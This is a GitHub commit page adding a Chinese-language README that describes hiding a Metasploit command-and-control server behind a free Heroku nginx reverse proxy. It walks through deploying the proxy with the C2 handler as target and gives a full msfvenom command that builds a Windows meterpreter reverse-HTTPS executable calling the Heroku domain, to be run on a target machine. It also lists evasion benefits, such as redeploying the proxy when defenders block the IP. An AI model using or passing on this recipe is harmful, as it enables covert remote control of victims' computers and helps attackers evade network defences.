Skip to content

Commit 7b270e7

Browse files
FunnyWolfFunnyWolf
authored
Create README.md
1 parent f2da6c2 commit 7b270e7

File tree

1 file changed

+41
-0
lines changed

1 file changed

+41
-0
lines changed

README.md

+41
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,41 @@
1+
# 利用heroku隐藏C2服务器
2+
Heroku是一个支持多种编程语言的云平台即服务。简单理解就是可以免费部署docker容器并且可以开放web服务到互联网.下面介绍操作步骤.
3+
4+
- 首先注册Heroku账号,点击通过 [https://dashboard.heroku.com](https://dashboard.heroku.com/) 注册一个账号 (推荐使用gmail)
5+
- 注册成功以后登录,登录以后点击 [部署链接](https://dashboard.heroku.com/new?template=https://github.com/FunnyWolf/nginx-proxy-heroku),
6+
- app名称填写为 `mydiydomain` (可自定义,名称为后续域名前缀),TARGET环境变量填写为C2的handler地址
7+
8+
![image.png](https://cdn.nlark.com/yuque/0/2020/png/159259/1603771065455-e03973a0-8763-4402-8b92-db358f8d0b1f.png#align=left&display=inline&height=488&margin=%5Bobject%20Object%5D&name=image.png&originHeight=976&originWidth=1224&size=76155&status=done&style=none&width=612)
9+
10+
- 然后点击 Deploy app 系统会自动部署.
11+
- 在metasploit-framework中添加handler,配置如图
12+
13+
![image.png](https://cdn.nlark.com/yuque/0/2020/png/159259/1603771665090-ad5c1ecd-c257-44f3-9128-4430183a2e34.png#align=left&display=inline&height=191&margin=%5Bobject%20Object%5D&name=image.png&originHeight=381&originWidth=1334&size=59756&status=done&style=none&width=667)![image.png](https://cdn.nlark.com/yuque/0/2020/png/159259/1603771713694-163331e4-cb96-4bb9-aa79-84980ab9c4ee.png#align=left&display=inline&height=155&margin=%5Bobject%20Object%5D&name=image.png&originHeight=309&originWidth=2281&size=88820&status=done&style=none&width=1140.5)
14+
15+
16+
- 执行 `to_handler` 生成listener
17+
- 使用如下命令生成payload
18+
```bash
19+
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=mydiydomain.herokuapp.com LPORT=443 -f exe -o ~/payload.exe
20+
```
21+
22+
- 上传运行目标机器运行即可
23+
# 运行效果
24+
25+
- 在metasploit-framework中查看session如下,可以看到session的链接地址为heroku中转服务器地址
26+
27+
![image.png](https://cdn.nlark.com/yuque/0/2020/png/159259/1603772048769-0192b120-768f-45ef-986f-4c13d4c1fae4.png#align=left&display=inline&height=133&margin=%5Bobject%20Object%5D&name=image.png&originHeight=265&originWidth=1737&size=32159&status=done&style=none&width=868.5)
28+
29+
- 在目标机抓包效果如下
30+
31+
![image.png](https://cdn.nlark.com/yuque/0/2020/png/159259/1603772254394-2251f568-89ae-48de-9c55-36b864bbffb0.png#align=left&display=inline&height=33&margin=%5Bobject%20Object%5D&name=image.png&originHeight=66&originWidth=802&size=6382&status=done&style=none&width=401)
32+
![image.png](https://cdn.nlark.com/yuque/0/2020/png/159259/1603772434299-3721e8f1-0eae-4296-b735-a741b20830d8.png#align=left&display=inline&height=230&margin=%5Bobject%20Object%5D&name=image.png&originHeight=459&originWidth=1612&size=144248&status=done&style=none&width=806)
33+
![image.png](https://cdn.nlark.com/yuque/0/2020/png/159259/1603772464467-3e81edaf-c634-42de-8e79-8ef5091a7c03.png#align=left&display=inline&height=768&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1535&originWidth=1296&size=272442&status=done&style=none&width=648)
34+
# 总结
35+
heroku隐藏C2从技术原理上看非常简单,使用heroku服务部署nginx反向代理服务,payload连接heroku的nginx,nginx将流量转发到C2.具体优势如下:
36+
37+
- 只需要注册heroku免费账号即可
38+
- 无需注册或购买域名
39+
- 自带可信的SSL证书(heroku域名自带证书)
40+
- 如果IP地址被封锁,可删除原有heroku app重新部署heroku app(大约需要30s),与防守人员持续对抗
41+
- 操作步骤简单

0 commit comments

Comments
 (0)